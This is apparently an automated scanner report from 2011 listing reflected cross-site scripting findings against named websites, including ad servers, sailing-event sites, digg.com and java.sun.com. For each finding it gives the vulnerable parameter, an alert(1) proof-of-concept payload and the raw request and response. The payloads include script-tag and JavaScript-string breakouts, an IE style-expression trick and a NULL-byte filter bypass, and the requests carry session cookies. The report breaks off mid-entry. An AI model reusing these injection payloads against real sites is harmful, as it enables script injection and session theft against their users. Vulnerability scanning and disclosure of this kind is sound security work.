GET /adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524?a595d'-alert(1)-'08a39541440 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 439 Date: Thu, 20 Jan 2011 00:26:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:51 GMT
The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80dea'><script>alert(1)</script>985349a7ad9 was submitted in the co parameter. This input was echoed as 80dea\'><script>alert(1)</script>985349a7ad9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?lang=en&fn=folio&FolioID=82&co=180dea'><script>alert(1)</script>985349a7ad9 HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:37:31 GMT Server: Apache Set-Cookie: PHPSESSID=882939946f78dec4fe5d77aa92196538; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 188578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... <input type='hidden' name='co' id='co' value='180dea\'><script>alert(1)</script>985349a7ad9'> ...[SNIP]...
The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69038"><script>alert(1)</script>d659b058562 was submitted in the co parameter. This input was echoed as 69038\"><script>alert(1)</script>d659b058562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?lang=en&fn=folio&FolioID=82&co=169038"><script>alert(1)</script>d659b058562 HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:37:29 GMT Server: Apache Set-Cookie: PHPSESSID=f9889914ca2b88440659f29a0afa8321; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 188578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... <a href="AC-45--wing-and-platform-finalization,82,169038\"><script>alert(1)</script>d659b058562,en,fp.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('imgpetite','','./taiga/americascup/4pictos_vign_petite_on.gif',1)"> ...[SNIP]...
3.7. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://armchairmango.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5887"><script>alert(1)</script>9370de61105 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?e5887"><script>alert(1)</script>9370de61105=1 HTTP/1.1 Host: armchairmango.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.8. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://armchairmango.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a409'%3balert(1)//6d1e7a506f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a409';alert(1)//6d1e7a506f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /posts?7a409'%3balert(1)//6d1e7a506f9=1 HTTP/1.1 Host: armchairmango.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 897c2<script>alert(1)</script>66f32101386 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creativeCommonsRssModule897c2<script>alert(1)</script>66f32101386 HTTP/1.1 Host: backend.userland.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 389 Content-Type: text/html Date: Thu, 20 Jan 2011 00:37:07 GMT Server: UserLand Frontier/9.5-WinNT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><title>404 Not Found</title> </head> <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red"> < ...[SNIP]... </h2> The requested URL http://backend.userland.com/creativeCommonsRssModule897c2<script>alert(1)</script>66f32101386 was not found on this server. </body> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a3a1<script>alert(1)</script>b9e99fd9f5f was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
FeaturedContent.populateFeatured6a3a1<script>alert(1)</script>b9e99fd9f5f([{ "title":"Food Swap", "adminTitle":"Food Swap", "description":"Canned elk anyone? The summer\'s harvest is long over. Hours spent near a hot stove canning those tomatoes, peaches, or pickling be ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7aa1<script>alert(1)</script>2de7005331c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /crossdomain.xmle7aa1<script>alert(1)</script>2de7005331c HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:28:16 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:16 GMT; path=/; domain=.btrll.com Content-Length: 206 Content-Type: text/html; charset=UTF-8
<html> <head> <title>Not Found</title> </head> <body> <h1>404 - Not Found</h1> Found unexpected '.' character in position 1 of path: /crossdomain.xmle7aa1<script>alert(1)</script>2de7005331c</body> </ ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9bac"><script>alert(1)</script>ae91c46f784 was submitted in the REST URL parameter 1. This input was echoed as f9bac"><script>alert(1)</script>ae91c46f784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00f9bac"><script>alert(1)</script>ae91c46f784 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b90fa'%3balert(1)//c600b73d47 was submitted in the redir parameter. This input was echoed as b90fa';alert(1)//c600b73d47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3Fb90fa'%3balert(1)//c600b73d47 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb448794=5_[r^kI/7ZrO@Pn0nf8MJg5TL?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiPxP-XtM-6VNaBWHfHSmrEEI5gjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAALAkBAgUCAAUAAAAAKiFTbQAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483449%29%3Buf%28%27r%27%2C+151608%2C+1295483449%29%3Bppv%2882%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2884%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2811%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2882%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2884%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2887%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28619%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28620%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28621%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTPg(12lh-=?(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!9VNR'OLN2; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:30:49 GMT Content-Length: 429
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4b7"style%3d"x%3aexpression(alert(1))"7e6ef821d0e was submitted in the REST URL parameter 1. This input was echoed as 5a4b7"style="x:expression(alert(1))"7e6ef821d0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /products5a4b7"style%3d"x%3aexpression(alert(1))"7e6ef821d0e/plugin/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 20 Jan 2011 00:41:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sun Microsystems</title> <!-- BEGIN METADATA --> <meta http-equiv="content-type" content="text/html; charse ...[SNIP]... <a href="/contact/feedback.jsp? referer=http://java.sun.com/notfound.jsp &requrl=http://java.sun.com/products5a4b7"style="x:expression(alert(1))"7e6ef821d0e/plugin/autodl/jinstall-1_4_2-windows-i586.cab &refurl=http://java.sun.com/UserTypedUrl &category=se"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec44"style%3d"x%3aexpression(alert(1))"e3f53b57d76 was submitted in the REST URL parameter 2. This input was echoed as 5ec44"style="x:expression(alert(1))"e3f53b57d76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /products/plugin5ec44"style%3d"x%3aexpression(alert(1))"e3f53b57d76/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 20 Jan 2011 00:40:41 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sun Microsystems</title> <!-- BEGIN METADATA --> <meta http-equiv="content-type" content="text/html; charse ...[SNIP]... <a href="/contact/feedback.jsp? referer=http://java.sun.com/notfound.jsp &requrl=http://java.sun.com/products/plugin5ec44"style="x:expression(alert(1))"e3f53b57d76/autodl/jinstall-1_4_2-windows-i586.cab &refurl=http://java.sun.com/UserTypedUrl &category=se"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5475e"style%3d"x%3aexpression(alert(1))"7c7f389030d was submitted in the REST URL parameter 3. This input was echoed as 5475e"style="x:expression(alert(1))"7c7f389030d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /products/plugin/5475e"style%3d"x%3aexpression(alert(1))"7c7f389030d/jinstall-1_4_2-windows-i586.cab HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 20 Jan 2011 00:41:33 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sun Microsystems</title> <!-- BEGIN METADATA --> <meta http-equiv="content-type" content="text/html; charse ...[SNIP]... <a href="/contact/feedback.jsp? referer=http://java.sun.com/notfound.jsp &requrl=http://java.sun.com/products/plugin/5475e"style="x:expression(alert(1))"7c7f389030d/jinstall-1_4_2-windows-i586.cab &refurl=http://java.sun.com/UserTypedUrl &category=se"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c28e'-alert(1)-'ec11dfd28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.martini5c28e'-alert(1)-'ec11dfd28f8/;sz=728x90;net=cm;ord=3271752524;ord1=707118;cmpgurl=http%253A//www.sailinganarchy.com/index_page1.php? HTTP/1.1 Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Thu, 20 Jan 2011 00:30:32 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:31 GMT Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:31 GMT Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Thu, 27-Jan-2011 00:30:31 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Thu, 20-Jan-2011 08:30:31 GMT Content-Length: 8065
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-95806145_1295483431","http://ib.adnxs.com/ptj?member=311&inv_code=cm.martini5c28e'-alert(1)-'ec11dfd28f8&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini5c28e%27-alert%281%29-%27ec11dfd28f8%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-958061 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1943c'-alert(1)-'aa62200fb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.martini/;sz=1943c'-alert(1)-'aa62200fb HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; mmpg=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Date: Thu, 20 Jan 2011 00:43:08 GMT Content-Length: 7417 Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10628852_1295484188","http://ib.adnxs.com/ptj?member=311&inv_code=cm.martini&size=1943c'-alert(1)-'aa62200fb&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10628852_1295484188%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.weath_l-cm.sports_m%3B%3Bcmw%3D ...[SNIP]...
The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bf0a'><script>alert(1)</script>4694b2364e4 was submitted in the co parameter. This input was echoed as 9bf0a\'><script>alert(1)</script>4694b2364e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?lang=en&fn=folio&FolioID=83&co=19bf0a'><script>alert(1)</script>4694b2364e4 HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:45:13 GMT Server: Apache Set-Cookie: PHPSESSID=586c6741fdb46ae80b334070c12e8931; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 156744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... <input type='hidden' name='co' id='co' value='19bf0a\'><script>alert(1)</script>4694b2364e4'> ...[SNIP]...
The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1fa"><script>alert(1)</script>8102d3b9511 was submitted in the co parameter. This input was echoed as ea1fa\"><script>alert(1)</script>8102d3b9511 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?lang=en&fn=folio&FolioID=83&co=1ea1fa"><script>alert(1)</script>8102d3b9511 HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:45:11 GMT Server: Apache Set-Cookie: PHPSESSID=1a85d98a42aae84687229b91132260fb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 156744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... <a href="AC-45--launched---,83,1ea1fa\"><script>alert(1)</script>8102d3b9511,en,fp.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('imgpetite','','./taiga/americascup/4pictos_vign_petite_on.gif',1)"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f3b5"><script>alert(1)</script>10ac75364ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/actualite7f3b5"><script>alert(1)</script>10ac75364ee/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:45:17 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web12; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... <a href="/es/actualite7f3b5"><script>alert(1)</script>10ac75364ee/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd18a"><script>alert(1)</script>a1caa06401 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/actualite/brevesdd18a"><script>alert(1)</script>a1caa06401/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:45:18 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web11; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... <a href="/es/actualite/brevesdd18a"><script>alert(1)</script>a1caa06401/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 43a5a--><script>alert(1)</script>e94251ccb77 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
